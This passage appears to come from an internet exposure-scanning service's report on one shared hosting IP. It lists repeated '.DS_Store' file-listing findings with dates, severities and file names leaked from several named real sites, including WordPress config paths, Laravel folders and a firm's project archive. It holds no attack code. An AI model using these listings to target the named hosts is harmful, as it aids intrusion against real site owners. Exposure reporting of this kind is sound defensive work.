Host 162.241.253.33
United States
Software information
Apache
tcp/443 tcp/80
nginx 1.21.6
tcp/443 tcp/80
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:14
Last seen 2024-09-16 22:59
Open for 696 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 22:59
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-20 18:18
Last seen 2024-09-16 22:57
Open for 697 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bc5e74dd734213f79136acb1d242cea00cFound 22 files trough .DS_Store spidering: /all_dropdown.css /DIN-HOME-Chartered-Contractors-LOGO.gif /dinhome_contact.css /dinhome_home.css /favicon-16x16.png /favicon-32x32.png /history_company /history_company/careers_&_development /history_company/images /history_company/images/inventory /history_company/posters /history_company/runway_models /history_company/runway_models/images /history_company/runway_models/images/inventory /history_company/runway_models/index.html /images /index.html /job /main.css /privacy_statement_of_dinhome_design_main.css /project_management.css /SpryAssets
Found on 2024-09-16 22:57
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-21 18:48
Last seen 2024-09-16 22:47
Open for 635 days-
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea96367f45a086ed07d01b7f20fc0dbb463Found 23 files trough .DS_Store spidering: /index.php /jetpack-onboarding /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 22:47
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:14
Last seen 2024-09-16 22:27
Open for 696 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 22:27
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-11-15 18:48
Last seen 2024-09-16 22:10
Open for 671 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c0f8dcf020f8dcf022cde107afb89857b45585b797b886794Found 24 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic /vendor/nikic/php-parser /vendor/nikic/php-parser/grammar
Found on 2024-09-16 22:10 -
Severity: low
Fingerprint: 5f32cf5d6962f09cc169dbbec169dbbeb528917e25902aaf5d00bdb5c2c1e2b6Found 15 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /storage /vendor
Found on 2024-09-11 00:11 -
Severity: low
Fingerprint: 5f32cf5d6962f09c3838040e3838040e63c0c24ebce1d55f2bae9bc5f6c52a62Found 20 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /vendor
Found on 2024-09-06 18:48 -
Severity: low
Fingerprint: 5f32cf5d6962f09cdafa5447dafa54477e9c741770974cf2312fc9a86ce8753cFound 18 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/front /storage /vendor
Found on 2024-08-30 19:21 -
Severity: low
Fingerprint: 5f32cf5d6962f09c47dfe71947dfe719e3814ae542659040cc07a8e2c152138aFound 16 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /storage /vendor
Found on 2024-08-22 20:21 -
Severity: low
Fingerprint: 5f32cf5d6962f09cab28146bab28146bd709a4939e89f2aeca6749acb9c6f979Found 21 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor
Found on 2024-08-18 09:42 -
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea969d9d335f9934f705c12d53258a00b9eFound 23 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic /vendor/nikic/php-parser
Found on 2024-07-20 22:30 -
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcb3f27bc0f1583bf9b622747351ac7f20Found 22 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic
Found on 2024-07-18 07:46 -
Severity: low
Fingerprint: 5f32cf5d6962f09c668fcbec668fcbecbebd11f020c27e09ac3db5a38cbbdbfcFound 17 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/front /storage /vendor
Found on 2023-03-17 17:43 -
Severity: low
Fingerprint: 5f32cf5d6962f09c39aac35b39aac35b22ee27c3c0b24ffef617025c0b216be3Found 14 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /config /public /resources /storage /vendor
Found on 2022-11-15 18:48
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2024-08-17 21:55
Last seen 2024-09-16 22:08
Open for 30 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c7cf176427cf17642b4ffba1cabd14320abd14320abd14320Found 2 files trough .DS_Store spidering: /wp-content /wp-includes
Found on 2024-09-16 22:08
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2024-08-17 21:55
Last seen 2024-09-16 22:07
Open for 30 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c7cf176427cf17642b4ffba1cabd14320abd14320abd14320Found 2 files trough .DS_Store spidering: /wp-content /wp-includes
Found on 2024-09-16 22:07
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-31 18:55
Last seen 2024-09-16 22:03
Open for 625 days-
Severity: high
Fingerprint: 5f32cf5d6962f09c778888b4778888b43443393d58fc2c8742783f2be340ec03Found 40 files trough .DS_Store spidering: /admin-ajax.php /after_disaster_relief.css /after_disaster_relief.html /all_dropdown.css /commercial_dinhome_home.css /commercial_renovations.css /commercial_renovations.html /constrcution_worker_jobs_employment.css /constrcution_worker_jobs_employment.html /demolition.css /demolition.html /demolition_frame2.png /dinhome_contact.html /dinhome_home.css /dinhome_home_projects.css /favicon-16x16.png /favicon-32x32.png /home_renovations.css /home_renovations.html /images /images/logo-DinHome-Design.png /index.html /interior_design.css /interior_design.html /job /main.css /new_construction.css /new_construction.html /NK2502_Topo_anglais_2020-02-07_Land_Serveyor.dwg /privacy_statement_of_dinhome_design.html /privacy_statement_of_dinhome_design_main.css /project_management.css /project_management.html /projects_progress_folders /projects_progress_folders.zip /Rapport étude de sol lot SOIL SAMPLES # 1 557 039.PDF /respond.min.js /SpryAssets /structural_modifications.css /structural_modifications.html
Found on 2024-09-16 22:03 -
Severity: high
Fingerprint: 5f32cf5d6962f09cb3107650b31076503f4cb3d101e7186bd8615dff142b579dFound 39 files trough .DS_Store spidering: /admin-ajax.php /after_disaster_relief.css /after_disaster_relief.html /all_dropdown.css /commercial_dinhome_home.css /commercial_renovations.css /commercial_renovations.html /constrcution_worker_jobs_employment.css /constrcution_worker_jobs_employment.html /demolition.css /demolition.html /demolition_frame2.png /dinhome_contact.html /dinhome_home.css /dinhome_home_projects.css /favicon-16x16.png /favicon-32x32.png /home_renovations.css /home_renovations.html /images /index.html /interior_design.css /interior_design.html /job /main.css /new_construction.css /new_construction.html /NK2502_Topo_anglais_2020-02-07_Land_Serveyor.dwg /privacy_statement_of_dinhome_design.html /privacy_statement_of_dinhome_design_main.css /project_management.css /project_management.html /projects_progress_folders /projects_progress_folders.zip /Rapport étude de sol lot SOIL SAMPLES # 1 557 039.PDF /respond.min.js /SpryAssets /structural_modifications.css /structural_modifications.html
Found on 2024-05-13 01:14
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2024-08-17 21:55
Last seen 2024-09-16 21:43
Open for 29 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c7cf176427cf17642b4ffba1cabd14320abd14320abd14320Found 2 files trough .DS_Store spidering: /wp-content /wp-includes
Found on 2024-09-16 21:43
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: saffron.austynandbrian.com
Port: 443
URL: https://saffron.austynandbrian.comFirst seen 2022-09-12 17:40
Last seen 2024-09-16 21:42
Open for 735 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 21:42
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-31 18:54
Last seen 2024-09-16 21:37
Open for 625 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c7cf176427cf17642f59365a3875f972d875f972d875f972dFound 2 files trough .DS_Store spidering: /images /images/Kickstarter_pre_order
Found on 2024-09-16 21:37
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-21 18:48
Last seen 2024-09-16 21:32
Open for 635 days-
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea96367f45a086ed07d01b7f20fc0dbb463Found 23 files trough .DS_Store spidering: /index.php /jetpack-onboarding /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 21:32
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.cfd.ohc.lwj.mybluehost.me
Port: 443
URL: https://www.cfd.ohc.lwj.mybluehost.meFirst seen 2022-09-03 17:48
Last seen 2024-09-16 21:31
Open for 744 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c668fcbec668fcbec9fac0e6672cfcb39a5c2afdd8a3c8cc6Found 17 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-includes /wp-snapshots
Found on 2024-09-16 21:31 -
Severity: low
Fingerprint: 5f32cf5d6962f09c87f05b7087f05b70375faefa4ce46cd5179878e9afa5fbd6Found 26 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/upgrade /wp-content/uploads /wp-includes /wp-snapshots
Found on 2024-09-14 06:50 -
Severity: medium
Fingerprint: 5f32cf5d6962f09cb3107650b31076505d8d3f5a68139ff5a664350911313d28Found 39 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/themes/cfd /wp-content/themes/cfd/_notes /wp-content/themes/cfd/assets /wp-content/themes/cfd/assets/css /wp-content/themes/cfd/assets/fonts /wp-content/themes/cfd/assets/img /wp-content/themes/cfd/assets/js /wp-content/themes/cfd/assets/less /wp-content/themes/cfd/assets/vendor /wp-content/themes/cfd/lang /wp-content/themes/cfd/lib /wp-content/themes/cfd/templates /wp-content/themes/twentyfifteen /wp-content/upgrade /wp-content/uploads /wp-includes /wp-snapshots
Found on 2024-09-10 14:38 -
Severity: low
Fingerprint: 5f32cf5d6962f09cab28146bab28146b0b68ebdd68da4928bc84bb7202e1ad59Found 21 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/themes /wp-content/upgrade /wp-content/uploads /wp-includes /wp-snapshots
Found on 2024-09-10 14:38 -
Severity: medium
Fingerprint: 5f32cf5d6962f09cef4770e6ef4770e677d071b8249d3e0bef342ccf792ff97eFound 42 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/themes/cfd /wp-content/themes/cfd/_notes /wp-content/themes/cfd/assets /wp-content/themes/cfd/assets/css /wp-content/themes/cfd/assets/fonts /wp-content/themes/cfd/assets/img /wp-content/themes/cfd/assets/js /wp-content/themes/cfd/assets/less /wp-content/themes/cfd/assets/vendor /wp-content/themes/cfd/lang /wp-content/themes/cfd/lib /wp-content/themes/cfd/templates /wp-content/themes/twentyfifteen /wp-content/upgrade /wp-content/uploads /wp-content/uploads/2014 /wp-content/uploads/2014/10 /wp-content/uploads/2015 /wp-includes /wp-snapshots
Found on 2024-09-01 15:51 -
Severity: medium
Fingerprint: 5f32cf5d6962f09c7d264b917d264b9160849753017c087673603fa87cbe0457Found 52 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/themes/cfd /wp-content/themes/cfd/_notes /wp-content/themes/cfd/assets /wp-content/themes/cfd/assets/css /wp-content/themes/cfd/assets/fonts /wp-content/themes/cfd/assets/img /wp-content/themes/cfd/assets/js /wp-content/themes/cfd/assets/less /wp-content/themes/cfd/assets/vendor /wp-content/themes/cfd/lang /wp-content/themes/cfd/lib /wp-content/themes/cfd/templates /wp-content/themes/twentyfifteen /wp-content/upgrade /wp-content/uploads /wp-content/uploads/2014 /wp-content/uploads/2014/10 /wp-content/uploads/2015 /wp-includes /wp-includes/certificates /wp-includes/css /wp-includes/fonts /wp-includes/ID3 /wp-includes/images /wp-includes/js /wp-includes/pomo /wp-includes/SimplePie /wp-includes/Text /wp-includes/theme-compat /wp-snapshots
Found on 2024-08-28 10:16 -
Severity: low
Fingerprint: 5f32cf5d6962f09c31c2f0b631c2f0b60d4a9648ccc0591bcf51b8df2dde76fdFound 28 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/themes/cfd /wp-content/themes/twentyfifteen /wp-content/upgrade /wp-content/uploads /wp-includes /wp-snapshots
Found on 2024-08-06 19:58 -
Severity: low
Fingerprint: 5f32cf5d6962f09c8329733f8329733f267656412fc17a2402c7a0ee4f232867Found 10 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-content /wp-includes /wp-snapshots
Found on 2022-09-03 17:48
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:02
Last seen 2024-09-16 21:31
Open for 696 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 21:31
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: maisondin-ca.hff.xrd.mybluehost.me
Port: 443
URL: https://maisondin-ca.hff.xrd.mybluehost.meFirst seen 2024-06-21 12:43
Last seen 2024-09-16 21:23
Open for 87 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c2eda814e2eda814efa4e382f4ba6ab874f3a0e468067f85fFound 6 files trough .DS_Store spidering: /_notes /Din-Home_marketing_consultants /Din-Home_marketing_consultants/Photoshop /Din-Home_marketing_consultants/SpryAssets /images /SpryAssets
Found on 2024-09-16 21:23
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-31 18:54
Last seen 2024-09-16 21:23
Open for 625 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c7cf176427cf17642f59365a3875f972d875f972d875f972dFound 2 files trough .DS_Store spidering: /images /images/Kickstarter_pre_order
Found on 2024-09-16 21:23
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-21 18:48
Last seen 2024-09-16 21:18
Open for 635 days-
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea96367f45a086ed07d01b7f20fc0dbb463Found 23 files trough .DS_Store spidering: /index.php /jetpack-onboarding /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 21:18
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-09-15 17:38
Last seen 2024-09-16 21:16
Open for 732 days-
Severity: low
Fingerprint: 5f32cf5d6962f09cc169dbbec169dbbeb528917e25902aaf5d00bdb5c2c1e2b6Found 15 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /storage /vendor
Found on 2024-09-16 21:16 -
Severity: low
Fingerprint: 5f32cf5d6962f09c39aac35b39aac35b22ee27c3c0b24ffef617025c0b216be3Found 14 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /config /public /resources /storage /vendor
Found on 2024-09-14 12:48 -
Severity: low
Fingerprint: 5f32cf5d6962f09c8329733f8329733fad82b89f858ea44a282594c078c97bdeFound 10 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /config /public /resources /storage /vendor
Found on 2024-09-06 18:53 -
Severity: low
Fingerprint: 5f32cf5d6962f09c3af247253af247251dec61f970f3a6842d5ea24eb2f28027Found 9 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Http /config /public /resources /storage /vendor
Found on 2024-09-04 19:52 -
Severity: low
Fingerprint: 5f32cf5d6962f09c0f8dcf020f8dcf022cde107afb89857b45585b797b886794Found 24 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic /vendor/nikic/php-parser /vendor/nikic/php-parser/grammar
Found on 2024-09-02 20:29 -
Severity: low
Fingerprint: 5f32cf5d6962f09c47dfe71947dfe719e3814ae542659040cc07a8e2c152138aFound 16 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /storage /vendor
Found on 2024-09-01 12:47 -
Severity: low
Fingerprint: 5f32cf5d6962f09c11d3744d11d3744d7da9d3d1721513ecb65012164009fb37Found 12 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Requests /config /public /resources /storage /vendor
Found on 2024-08-20 20:45 -
Severity: low
Fingerprint: 5f32cf5d6962f09c3838040e3838040e63c0c24ebce1d55f2bae9bc5f6c52a62Found 20 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /vendor
Found on 2024-07-28 19:58 -
Severity: low
Fingerprint: 5f32cf5d6962f09cdafa5447dafa54477e9c741770974cf2312fc9a86ce8753cFound 18 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/front /storage /vendor
Found on 2024-06-28 12:55 -
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcb3f27bc0f1583bf9b622747351ac7f20Found 22 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic
Found on 2023-09-19 02:44
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: lumbralmexico.monasteriourbano.com
Port: 443
URL: https://lumbralmexico.monasteriourbano.comFirst seen 2022-10-20 18:34
Last seen 2024-09-16 21:15
Open for 697 days-
Severity: low
